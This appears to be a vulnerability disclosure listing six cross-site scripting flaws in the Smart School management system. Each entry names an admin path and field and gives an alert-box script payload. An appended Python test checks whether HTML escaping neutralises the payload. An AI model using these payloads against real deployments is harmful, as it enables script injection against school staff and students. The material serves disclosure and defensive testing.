Smart School : School Management System > All vers affected

2023.03.05
Credit: Eren Arslan
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Title: Smart School : School Management System > All vers affected
# Author: @Eawhitehat - Eren Arslan
# Vendor: https://smart-school.in/
# Demo available : https://demo.smart-school.in/site/login#
# Software Link: https://smart-school.in/
# CVE: N/A

# Multiple XSS

- XSS 1 :
Connect to the Smart School panel.
Paste into search : "><script>alert(/eawhitehat is here/)</script>

- XSS 2 :
Connect to the Smart School panel.
Go to /admin/generalcall
In the "name" field enter the following payload: "><script>alert(/eawhitehat is here/)</script>
The rest of the information can be wrong; then save.

- XSS 3 :
Connect to the Smart School panel.
Go to /admin/dispatch
In the "title" field enter the following payload: "><script>alert(/eawhitehat is here/)</script>
The rest of the information can be wrong; then save.

- XSS 4 :
Connect to the Smart School panel.
Go to /admin/receive
In the "title" field enter the following payload: "><script>alert(/eawhitehat is here/)</script>
The rest of the information can be wrong; then save.

- XSS 5 :
Connect to the Smart School panel.
Go to /admin/complaint
In the "Complain By" field enter the following payload: "><script>alert(/eawhitehat is here/)</script>
The rest of the information can be wrong; then save.

- XSS 6 :
Connect to the Smart School panel.
Go to /admin/visitorspurpose
In the "Purpose" field enter the following payload: "><script>alert(/eawhitehat is here/)</script>
The rest of the information can be wrong; then save.
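A regression check for the fix, as an added example (not part of the advisory and not the vendor's code). It assumes the submitted value is echoed back inside a double-quoted HTML attribute, which the leading `">` of the payload suggests but the page does not state; `render_unsafe`, `render_safe`, `is_inert` and `audit` are hypothetical names, and the renderers stand in for the application's real templates.

```python
import html
from html.parser import HTMLParser

# Payload exactly as given in the advisory.
PAYLOAD = '"><script>alert(/eawhitehat is here/)</script>'

# (location, field) pairs listed in the advisory; the search box has no path on the page.
AFFECTED = [
    ("(panel search)", "search"),
    ("/admin/generalcall", "name"),
    ("/admin/dispatch", "title"),
    ("/admin/receive", "title"),
    ("/admin/complaint", "Complain By"),
    ("/admin/visitorspurpose", "Purpose"),
]

def render_unsafe(value):
    # Assumed vulnerable pattern: user input concatenated into an attribute.
    return '<input type="text" name="f" value="' + value + '">'

def render_safe(value):
    # quote=True encodes & < > " ' so the value cannot close the attribute.
    return '<input type="text" name="f" value="' + html.escape(value, quote=True) + '">'

class TagCollector(HTMLParser):
    """Records every start tag and the attributes of the <input> element."""
    def __init__(self):
        super().__init__()
        self.tags, self.input_attrs = [], {}

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.input_attrs = dict(attrs)

def is_inert(render, value):
    # Inert means: the parser sees only the <input>, and the value
    # round-trips as attribute data instead of becoming markup.
    collector = TagCollector()
    collector.feed(render(value))
    collector.close()
    return collector.tags == ["input"] and collector.input_attrs.get("value") == value

def audit(render):
    # Return the advisory's fields whose rendering lets the payload become markup.
    return [(loc, field) for loc, field in AFFECTED if not is_inert(render, PAYLOAD)]

if __name__ == "__main__":
    print("unsafe renderer fails for:", audit(render_unsafe))
    print("escaped renderer fails for:", audit(render_safe))
```

In a real test suite, `render` would be replaced per field by the markup the application returns after the value has been saved.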

